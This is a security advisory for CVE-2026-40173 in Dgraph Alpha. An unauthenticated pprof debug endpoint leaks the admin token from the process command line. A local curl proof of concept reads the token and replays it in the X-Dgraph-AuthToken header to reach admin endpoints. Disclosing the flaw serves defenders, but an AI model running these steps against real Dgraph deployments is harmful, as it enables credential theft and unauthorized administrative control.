CVE-2026-40173
Summary
An unauthenticated debug endpoint in Dgraph Alpha exposes the full process command line, including the configured admin token from --security "token=...".
This does not break token validation logic directly; instead, it discloses the credential and enables unauthorized admin-level access by reusing the leaked token in X-Dgraph-AuthToken.
Details
The behavior occurs entirely within core Alpha HTTP routing and does not require any external proxy, plugin, or non-core integration.
The core issue is not that admin token protection is absent, but that the protected secret is exposed in cleartext through an unauthenticated core debug endpoint.
Relevant code paths:
dgraph/cmd/alpha/run.go:17importsnet/http/pprof, which registers/debug/pprof/*handlers on the default mux.dgraph/cmd/alpha/run.go:533useshttp.Handle("/", audit.AuditRequestHttp(baseMux)), so default-mux handlers remain reachable.dgraph/cmd/alpha/admin.go:52enforces admin token checks inadminAuthHandlerfor admin endpoints.dgraph/cmd/alpha/admin.go:74shows/admin/config/cache_mbbehindadminAuthHandler.
Credential-exposure chain:
/debug/pprof/cmdlineis reachable without authentication.- Its output includes the configured admin token from process arguments.
- The disclosed token is accepted by
adminAuthHandlerwhen sent asX-Dgraph-AuthToken. - An attacker gains unauthorized access to admin-only functionality.
Observed local evidence (safe validation):
- Request:
GET /admin/config/cache_mbwithout token - Status: 200 (request rejected at application layer)
- Body contains error:
Invalid X-Dgraph-AuthToken - The endpoint returns HTTP 200 but indicates authentication failure in the response body.
- Request:
GET /debug/pprof/cmdlinewithout token - Status: 200
- Body excerpt includes:
--security=token=TopSecretToken123; - Request:
GET /admin/config/cache_mbwithX-Dgraph-AuthToken: TopSecretToken123 - Status: 200
- Body:
4096
Important policy/triage clarification:
- This issue persists even when the admin-token security feature is enabled: the token itself is exposed via an unauthenticated core debug endpoint, making this more than a misconfiguration-only concern.
- Network restrictions (bind/whitelist/firewall) may reduce exposure, but they do not remediate the underlying credential disclosure behavior.
PoC
- Branch:
main - Commit:
b15c87e93 - Describe:
v25.3.1
Preconditions:
- Alpha HTTP port is reachable by attacker traffic.
- Admin token is configured via supported startup flag:
--security "token=...". /debug/pprof/*is exposed on the same Alpha HTTP listener.- This behavior occurs with documented startup flags and without any non-default or unsupported configuration.
Reproduction steps:
- Start Zero and Alpha (example local setup):
dgraph zero --my=127.0.0.1:5280 --port_offset=200 --bindall=false --wal=./zwdgraph alpha --my=127.0.0.1:7280 --zero=127.0.0.1:5280 --port_offset=200 --bindall=false --security "token=TopSecretToken123;" --postings=./p --wal=./w --tmp=./t
- Verify admin endpoint rejects unauthenticated request:
curl -i http://127.0.0.1:8280/admin/config/cache_mb- Expected body includes
Invalid X-Dgraph-AuthToken.
- Read token from unauthenticated debug endpoint:
curl -s http://127.0.0.1:8280/debug/pprof/cmdline- Expected output includes
--security=token=TopSecretToken123;.
- Reuse leaked token against admin endpoint:
curl -i -H "X-Dgraph-AuthToken: TopSecretToken123" http://127.0.0.1:8280/admin/config/cache_mb- Expected: successful response (example observed:
4096).
Note: The PoC uses 127.0.0.1 only for safe local validation. The vulnerable condition is unauthenticated reachability of /debug/pprof/cmdline; in any deployment where Alpha HTTP is reachable by untrusted parties, the same token disclosure and subsequent unauthorized admin access apply.
Impact
- Unauthenticated disclosure of a sensitive admin credential via debug endpoint, enabling unauthorized privileged administrative access through token reuse
- Operators running Dgraph Alpha with admin token configured, where Alpha HTTP/debug routes are reachable by untrusted users or networks.
The attack requires network reachability to the Alpha HTTP port. In deployments where this interface is exposed beyond trusted boundaries, the issue is remotely exploitable without authentication.
Depending on exposed admin functionality in deployment policy, this may allow configuration changes, operational control actions, and other privileged administrative operations exposed through /admin/*.
Package Versions Affected
Automatically patch vulnerabilities without upgrading
CVSS Version



Related Resources
References
https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p, https://nvd.nist.gov/vuln/detail/CVE-2026-40173, https://github.com/dgraph-io/dgraph, https://github.com/dgraph-io/dgraph/releases/tag/v25.3.2
